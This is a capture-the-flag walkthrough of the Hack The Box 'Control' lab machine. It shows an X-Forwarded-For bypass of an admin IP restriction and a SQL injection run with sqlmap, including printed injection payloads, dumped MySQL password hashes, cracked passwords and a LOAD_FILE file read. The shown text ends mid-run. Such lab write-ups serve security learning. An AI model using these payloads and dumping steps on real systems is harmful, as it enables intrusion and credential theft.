Hack The Box - Control
1. Intro
HackTheBox Control (10.10.10.167) is a Windows box released on the 23 Nov 2019. The box is based around performing Kerberos attacks on Domain Controllers.
2. The Setup
Vulnerable Machine Name: Control
Vulnerable Machine Network: 10.10.10.167
Attacker Machine: Kali Linux 2020.1 (Running on vmware)
Atter Machine VM: VMWare
Attacker Machine IP: 10.10.15.124Note The attacker IP address changed a number of times throughout this tutorial due to VPN issues.
3. Scanning
We begin by trying to enumerate any open ports and services running on our target. To do this we use nmap with the following command:
nmap -sV -A -p- -Pn -T4 -v 10.10.10.167
# Command breaks down as follows
-sV # Service Scan TCP
-A # OS and version detection + traceroute and scripts
-T4 # T4 Timing
-Pn # Disable ping
-p- # Scan all ports
10.10.10.167 # IP ControlNmap scan report for 10.10.10.167
Host is up (0.023s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
| fingerprint-strings:
| FourOhFourRequest, GetRequest, HTTPOptions, NULL, WMSRequest, giop:
|_ Host '10.10.15.124' is not allowed to connect to this MariaDB server
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=3/3%Time=5E5E4597%P=x86_64-pc-linux-gnu%r(NUL
SF:L,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GetRequest,4
SF:B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\
SF:x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,4B,
SF:"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(FourOhFourRequest
SF:,4B,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(WMSRequest,4B
SF:,"G\0\0\x01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\x
SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,4B,"G\0\0\x
SF:01\xffj\x04Host\x20'10\.10\.15\.124'\x20is\x20not\x20allowed\x20to\x20c
SF:onnect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
NSE: Script Post-scanning.
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Initiating NSE at 11:56
Completed NSE at 11:56, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.76 seconds
4. Service Enumeration
From our nmap scan we can see that there is not a lot running on this host outside of services on ports 80 and 135.
4.1 Samba (SMB)
We start our enumeration phase with Enum4Linux using the following command: enum4linux 10.10.10.167
After numerous attempts it became apparent that this was going to get us nowhere.
4.2 Webserver
Navigating the webpage on http://10.10.10.167 we are met with the following error when trying to access the admin page.
After performing some manual enumeration a comment was discovered that appeared to leak an internal IP address as shown in Figure 8.
5. Bypass IP blocks with the X-Forwarded-For header
It is well known that some web applications restrict access based on IP address of the visitor. This is particularly common for administrator interfaces in an attempt to restrict this interface to the IP addresses that are known to be used by actual administrators. It was discovered that it was possible to bypass the restriction on the admin page by spoofing the "X-Forwarded-For" HTTP header and set the IP address to the one found in Figure 8. The following outlines how this was done:
Firstly we setup a rule using the Burp extension "Add Custom Header" to add the "X-Forwarded-For" header to every request we make like so:
Next we go to our Project Options and add a new Session Handling Rule like so:
This successfully allowed us to bypass the IP restriction and access the Admin page.
6. SQL Injection
It was discovered that an SQL injection vulnerability exists in the admin page which resulted ultimately resulted in a low privilege shell. The following how this was done:
Firstly navigate to any product and select view like so:
Copy the request from Burp to a txt file and modify it as shown to include the url:
POST http://10.10.10.167/view_product.php HTTP/1.1
Host: 10.10.10.167
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.167/admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 12
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 192.168.4.28
productId=32Next using we can use SQLMAP to enumerate the databases by issuing the following command : sqlmap -r captured_request.txt --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.4.2#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:37:34 /2020-03-03/
[12:37:34] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[12:37:34] [INFO] testing connection to the target URL
[12:37:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:37:34] [INFO] testing if the target URL content is stable
[12:37:35] [INFO] target URL content is stable
[12:37:35] [INFO] testing if POST parameter 'productId' is dynamic
[12:37:35] [WARNING] POST parameter 'productId' does not appear to be dynamic
[12:37:35] [WARNING] heuristic (basic) test shows that POST parameter 'productId' might not be injectable
[12:37:35] [INFO] testing for SQL injection on POST parameter 'productId'
[12:37:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:37:45] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[12:37:46] [INFO] POST parameter 'productId' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --code=200)
[12:37:47] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[12:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:38:15] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:38:15] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:38:15] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:38:15] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:38:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:38:15] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[12:38:15] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:38:15] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[12:38:16] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[12:38:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[12:38:16] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[12:38:16] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[12:38:16] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[12:38:16] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[12:38:16] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[12:38:16] [INFO] testing 'MySQL inline queries'
[12:38:16] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:38:16] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[12:38:22] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:38:27] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:38:32] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:38:37] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:38:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:38:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[12:38:45] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[12:38:50] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[12:38:55] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[12:39:00] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[12:39:24] [INFO] POST parameter 'productId' appears to be 'MySQL < 5.0.12 AND time-based blind (heavy query)' injectable
[12:39:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[12:39:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[12:39:24] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:39:24] [INFO] target URL appears to have 1 column in query
[12:39:24] [INFO] POST parameter 'productId' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'productId' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: productId (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: productId=(SELECT (CASE WHEN (4037=4037) THEN 32 ELSE (SELECT 3212 UNION SELECT 8438) END))
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: productId=32 AND 5950=BENCHMARK(5000000,MD5(0x594d4754))
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: productId=32 UNION ALL SELECT CONCAT(0x716b626271,0x765265686c4f5845637852747149506857686c6e6149577242414d4b496d6177654e554d53766353,0x717a767671)-- WMEo
---
[12:39:30] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[12:39:30] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] mysql
[*] warehouse
[12:39:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 44 times
[12:39:30] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'
[*] ending @ 12:39:30 /2020-03-03/
We can see that there are three databases:
information_schema
mysql
warehouse
Focusing on the mysql database we attempt to retrieve a list of tables:
sqlmap -r captured_request.txt -D mysql --tables
___
__H__
___ ___[)]_____ ___ ___ {1.4.2#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:48:28 /2020-03-03/
[12:48:28] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[12:48:28] [INFO] resuming back-end DBMS 'mysql'
[12:48:28] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: productId=(SELECT (CASE WHEN (4037=4037) THEN 32 ELSE (SELECT 3212 UNION SELECT 8438) END))
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: productId=32 AND 5950=BENCHMARK(5000000,MD5(0x594d4754))
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: productId=32 UNION ALL SELECT CONCAT(0x716b626271,0x765265686c4f5845637852747149506857686c6e6149577242414d4b496d6177654e554d53766353,0x717a767671)-- WMEo
---
[12:48:29] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL < 5.0.12 (MariaDB fork)
[12:48:29] [INFO] fetching tables for database: 'mysql'
Database: mysql
[31 tables]
+---------------------------+
| user |
| column_stats |
| columns_priv |
| db |
| event |
| func |
| general_log |
| global_priv |
| gtid_slave_pos |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| index_stats |
| innodb_index_stats |
| innodb_table_stats |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| roles_mapping |
| servers |
| slow_log |
| table_stats |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| transaction_registry |
+---------------------------+
[12:48:29] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'
[*] ending @ 12:48:29 /2020-03-03/
Reviewing the output we next try to enumerate the columns in the users table.
sqlmap -r captured_request.txt -D mysql -T user --columns
___
__H__
___ ___[)]_____ ___ ___ {1.4.2#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:51:42 /2020-03-05/
[09:51:42] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[09:51:42] [INFO] resuming back-end DBMS 'mysql'
[09:51:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: productId=32;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[09:51:42] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:51:42] [INFO] fetching columns for table 'user' in database 'mysql'
Database: mysql
Table: user
[47 columns]
+------------------------+---------------------+
| Column | Type |
+------------------------+---------------------+
| User | char(80) |
| Alter_priv | varchar(1) |
| Alter_routine_priv | varchar(1) |
| authentication_string | longtext |
| Create_priv | varchar(1) |
| Create_routine_priv | varchar(1) |
| Create_tablespace_priv | varchar(1) |
| Create_tmp_table_priv | varchar(1) |
| Create_user_priv | varchar(1) |
| Create_view_priv | varchar(1) |
| default_role | longtext |
| Delete_history_priv | varchar(1) |
| Delete_priv | varchar(1) |
| Drop_priv | varchar(1) |
| Event_priv | varchar(1) |
| Execute_priv | varchar(1) |
| File_priv | varchar(1) |
| Grant_priv | varchar(1) |
| Host | char(60) |
| Index_priv | varchar(1) |
| Insert_priv | varchar(1) |
| is_role | varchar(1) |
| Lock_tables_priv | varchar(1) |
| max_connections | bigint(20) unsigned |
| max_questions | bigint(20) unsigned |
| max_statement_time | decimal(12,6) |
| max_updates | bigint(20) unsigned |
| max_user_connections | bigint(21) |
| Password | longtext |
| password_expired | varchar(1) |
| plugin | longtext |
| Process_priv | varchar(1) |
| References_priv | varchar(1) |
| Reload_priv | varchar(1) |
| Repl_client_priv | varchar(1) |
| Repl_slave_priv | varchar(1) |
| Select_priv | varchar(1) |
| Show_db_priv | varchar(1) |
| Show_view_priv | varchar(1) |
| Shutdown_priv | varchar(1) |
| ssl_cipher | longtext |
| ssl_type | varchar(9) |
| Super_priv | varchar(1) |
| Trigger_priv | varchar(1) |
| Update_priv | varchar(1) |
| x509_issuer | longtext |
| x509_subject | longtext |
+------------------------+---------------------+
[09:51:42] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'
Next we grab the password hashes for all the users using the following command:
sqlmap -r captured_request.txt -D mysql -T user -C user,Password --dump
___
__H__
___ ___["]_____ ___ ___ {1.4.2#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:54:03 /2020-03-05/
[09:54:03] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/POST.txt'
[09:54:03] [INFO] resuming back-end DBMS 'mysql'
[09:54:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: productId=32;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[09:54:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[09:54:03] [INFO] fetching entries of column(s) 'Password, `user`' for table 'user' in database 'mysql'
[09:54:03] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[09:54:03] [INFO] retrieved: '*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D','hector'
[09:54:03] [INFO] retrieved: '*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA','manager'
[09:54:03] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:03] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:04] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:04] [INFO] retrieved: '*0A4A5CAD344718DC418035A1F4D292BA603134D8','root'
[09:54:04] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[09:54:05] [INFO] using hash method 'mysql_passwd'
[09:54:05] [INFO] resuming password 'l3tm3!n' for hash '*cfe3eee434b38cbf709ad67a4dcdea476cba7fda'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[09:54:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[09:54:06] [INFO] starting dictionary-based cracking (mysql_passwd)
[09:54:06] [INFO] starting 4 processes
[09:54:07] [INFO] current status: 212 ... /
Database: mysql
Table: user
[6 entries]
+---------+-----------------------------------------------------+
| user | Password |
+---------+-----------------------------------------------------+
| hector | *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D |
| manager | *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA (l3tm3!n) |
| root | *0A4A5CAD344718DC418035A1F4D292BA603134D8 |
| root | *0A4A5CAD344718DC418035A1F4D292BA603134D8 |
| root | *0A4A5CAD344718DC418035A1F4D292BA603134D8 |
| root | *0A4A5CAD344718DC418035A1F4D292BA603134D8 |
+---------+-----------------------------------------------------+
[09:54:14] [INFO] table 'mysql.`user`' dumped to CSV file '/home/johnd/.sqlmap/output/10.10.10.167/dump/mysql/user.csv'
[09:54:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[09:54:14] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'
[*] ending @ 09:54:14 /2020-03-05/
Reviewing the output we can see that we have successfully cracked the password for the manager account - l3tm3!n. Checking the remaining hashes on CrackStation.net gives us the plaintext - l33th4x0rhector for the account belonging to hector.
sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --current-user --privileges
___
__H__
___ ___[.]_____ ___ ___ {1.4.2#stable}
|_ -| . [(] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:10:05 /2020-03-05/
[10:10:05] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:10:05] [INFO] resuming back-end DBMS 'mysql'
[10:10:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: productId=32;SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productId=32 AND (SELECT 4677 FROM (SELECT(SLEEP(5)))mAOG)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: productId=32 UNION ALL SELECT CONCAT(0x716b627171,0x6c7645426a66427172634645774268444b5652747756476567494a7859576269464d644c6c547250,0x7162627671)-- dhsC
---
[10:10:05] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[10:10:05] [INFO] fetching current user
current user: 'manager@localhost' <-------------------------------
[10:10:05] [INFO] fetching database users privileges
database management system users privileges:
[*] 'hector'@'localhost' (administrator) [29]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DELETE HISTORY
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'manager'@'localhost' [1]:
privilege: FILE <-------------------------------
[*] 'root'@'127.0.0.1' (administrator) [29]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DELETE HISTORY
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'::1' (administrator) [29]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DELETE HISTORY
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'fidelity' (administrator) [29]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DELETE HISTORY
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [29]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DELETE HISTORY
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[10:10:05] [INFO] fetched data logged to text files under '/home/johnd/.sqlmap/output/10.10.10.167'
[*] ending @ 10:10:05 /2020-03-05/
johnd@kali:~/Hack The Box/Control$
Checking the current user (manager) and there associated privileges, it can be seen that the user hasFILE privileges which means we have the ability to read and write files on the server using statements LOAD_FILE() for reading and INTO OUTFILE for writing. Validating this output we perform a simple Load_File query to read a file off the server like so:
sqlmap -r '/home/johnd/Hack The Box/Control/captured_request.txt' --sql-query "SELECT LOAD_FILE('C:/windows/system32/drivers/etc/hosts');"
___
__H__
___ ___[.]_____ ___ ___ {1.4.2#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:13:55 /2020-03-05/
[10:13:55] [INFO] parsing HTTP request from '/home/johnd/Hack The Box/Control/captured_request.txt'
[10:13:55] [INFO] resuming back-end DBMS 'mysql'
[10:13:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productId (POST)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: productId=(SELECT (CASE WHEN (1384=1384) THEN 32 ELSE (SELECT 4857 UNION SELECT 9781) END))
Type: stacked queries
